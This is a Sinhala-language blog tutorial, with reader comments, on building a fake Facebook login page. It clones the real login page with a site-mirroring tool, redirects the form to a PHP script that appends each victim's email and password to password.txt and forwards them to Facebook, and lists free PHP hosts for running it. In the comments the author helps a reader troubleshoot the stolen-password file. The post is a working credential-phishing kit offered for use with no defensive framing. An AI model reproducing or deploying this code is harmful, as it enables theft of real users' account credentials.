ආ කියන්න අමතක උනානේ , මේ ක්රමයට මුහුනුපොත (facebook) විතරක් නෙවෙයි , වෙන ජාලයේ ඇති ඕනැම (බොහෝ) වෙබ් site වල phishing එක ලෙසියෙන්ම හදාගන්න පුලුවන් .
වල් පල් ඇති . දැන් බලමුකෝ කොහොමද මේ phishing වෙබ් පිටුව හදාගන්නේ කියලා.
*මේ මෘදුකාංගය ගැන කිවොත් ඉතින් මුලිකවම මේකෙන් වෙන වෙබ් පිටු වල ඇති ඕනෙම මගුලක් (පින්තුර , විඩියෝ , ඕඩියෝ ........ ) ඇතුලුව එම වෙබ් පිටුවේ තනිකරම clone එකක් ගන්න පුලුවන් , වැඩි විස්තර :
- Versions available for Windows, Linux, Sun Solaris, and other Unix systems
(Other platforms may soon be included) - Multilingual Windows and Linux/Unix interface (English, Français, Castellano, Deutsch, Nederlands, Polski, Português, Italiano, Kréyòl Matinik, Magyar, Brazilian, Simplified Chinese, Traditional Chinese, Danish, Estonian, Swedish, Turkish, Macedonian, Japanese, Slovak, Czech, Ukrainian, Norwegian, Slovenian, Romanian, Greek)
- Free Software (GPL) (open source code given)
- Mirror one site, or more than one site together (with shared links)
- User-selectable recursion levels
- Quickly updates downloaded sites
and resumes interrupted downloads (due to connetion break, crash, etc.) - Filter by file type, link location, structure depth, file size, site size, accepted or refused sites or filename (with advanced wild cards)..
- Timeout and minimum transfer rate manager to abandon slowest sites
- Wizard to specify which links must be loaded (accept/refuse: link, all domain, all directory)
- Multiple-connection mode (default: 4 connections) maximizes download speed
- HTTP compression (gzip..)
- Proxy support to maximize speed, with optional authentication
- Reget (resume) for partially transfered files (HTTP/1.1)
- File names with original structure kept or splitted mode (one html folder, and one image folder), dos 8-3 filenames option and user-defined structure
- Automatic switch for "Moved" errors
- HTML parsing and tag analysis, including javascript code/embedded HTML code
- Basic java and Flash parsing
- Integrated DNS cache
- Native https and ipv6 support
- Native mms:// media streaming capture support
- Optional log file with error-log and comments-log
- User-specified paths for mirror and log files
- Works as a command-line program, or through a shell for both private (capture) or professionnal (on-line web mirror) use
1. ඉස්සෙල්ලාම මෘදුකාංගය අරගත්තාට පස්සේ ඒක විවෘත කරන්න කරලා , new project තෝරන්න.
2. ඊලගට Web address එක වෙනුවට "https://login.facebook.com/login.php" දෙන්න. වැඩ්ඩා නම් set options ගිහිල්ලා වැඩි කැලි තමන්ට ඕනේ විදිහට හදා ගන්න පුලුවන්.
3. ඊළඟ එන window එකේ Finish බොත්තම ඔබන්න .
4. ඔක්කොම ඉවර උනාට පස්සේ පහත පිංතුරයේ සදහන් පරිදි window එකක් ලැබේ , ඊට පසු සාදා ගත් වි්යාජ වෙබ් පිටුව බලා ගැනිම සදහා Browsed Mirror Website බොත්තම ඔබන්න.
5. ඊළගට කරන්න තියන්නේ හදාගත්ත වි්යාජ වෙබ් පිටුව තමන්ගේ පරිගනකයේ ස්ථාපනය (save) කල ස්ථානය සොයගෙන එය desktop එක වනි තැනකින් තබාගන්න . වි්යාජ වෙබ් පිටුව තමන්ගේ පරිගනකයේ ස්ථාපනය (save) කල ස්ථානය වනුයේ පලමු පියවරේදි save path ලෙස දුන් ස්ථානය වේ .තවද මෙහි folder කිහිපයක් ඇති අතර , ඒවායින් එකක login.html යනුවෙන් ගොනුවක් තිබේ (අපගේ වැඩේ සදහා අවශ්ය වනුයේ මෙම ගොනුව පමණි). පහත රුප පෙළ බලන්න.ඊලගට අපි බලමු කොහොමද අපි හදා ගත්ත ව්යාජ වෙබ් පිටුවට අපිට ඕනේ විදිහට කේතය (code) එක හදාගන්නේ කියලා.
1. පලමුව text editor එකක් උපයෝගි කරගෙන Html එක විවෘත කරගන්න .
2. CTRL+F උපයෝගි කරගෙන "action=" යන්න සොයා , එහි "https://login.facebook.com/login.php?login_attempt=1" මකාදමා ඒ වෙනුවට "login.php" ලෙස දමා එම ගොනුව save කරන්න .
3.දැන් අපි වි්යාජ facebook login වෙබ් පිටුව සාදා අවසානය. දැන් අපිට තව file එකක් ලොකුම කෙරුම කිරිමට අවශ්යය වේ. මෙය නම් අප සාදන ලද වි්යාජ facebook login වෙබ් පිටුවේ සටහන් කරන facebook පරිශ්රීලකයාගේ නම සහ මුරපදය අපේ වෙබ් site එකේ file එකක save කරගෙන නැවතත් facebook පරිශ්රීලකයාව හරි facebook වෙබ් පිටුවට යොමු කිරිමයි . මෙය කිරිම සදහා පහත කේතය text editor එකකට කොපි කර එය "login.php" ලෙස save කරන්න.
========================================================================
<?php
/* The code to open the file handle.. replace file_name with desired file name */
if (!($fp = fopen('password.txt', 'a'))) {
return;
}
/* replace the post data as required, this is the code to print to the file */
fprintf($fp, "Email = %s Password = %s", $_POST["email"], $_POST["pass"]);
header("Location: https://login.facebook.com/login.php");
exit;
?>
====================================================================
*මෙම පියවරේ මොනා හරි අවුලක් උනොත් comments වල අවුල දාන්නකෝ . ඕනෙම උදව්වක් කරන්නම් මම.
Php enabled Web Hosting වෙබ් site කිහිපයක් පහත දැක්වේ . මේවා යොදගන්න වැඩේට .
www.ofees.net
www.t35.com
www.ripway.com
www.t35.com
www.ripway.com
For more : http://www.absolutely-free-hosting.com/free-php-hosting.php






















4 comments:
cant upload this password.txt file ne ?
if u chmod the directorey correctly the password.txt file should be automatically created or else you can upload this file by creating a file (password.txt) in your hard & upload it ; in your condition the file hosting appears to be not supporting text files or there must be a error in file transfer (Ftp) , plz try again & give a reply with more details about the file hosting service that you are using , after that I may help you with your issue , hope this helps !!
thanks !
mechchara diga post uba kohoma daanawada manda.... matanam diga post liyanna welawak na.... anyway goodwork...
@ දනුක ප්රශාන් :
ප්රතිචාරයට බොහෝම ස්තුතියි !!! :D
ඕක ඔච්චර දිග වුනේ පිංතුර නිසා , මම ලිව්ව ටික තියන්නේ පොඩ්ඩයි , අනික ඔයාගේ බ්ලොග් එකේ පොස්ට් නම් මාර දිගයි (උදා : හැන්දින්විම) :P
Post a Comment
write your comments here!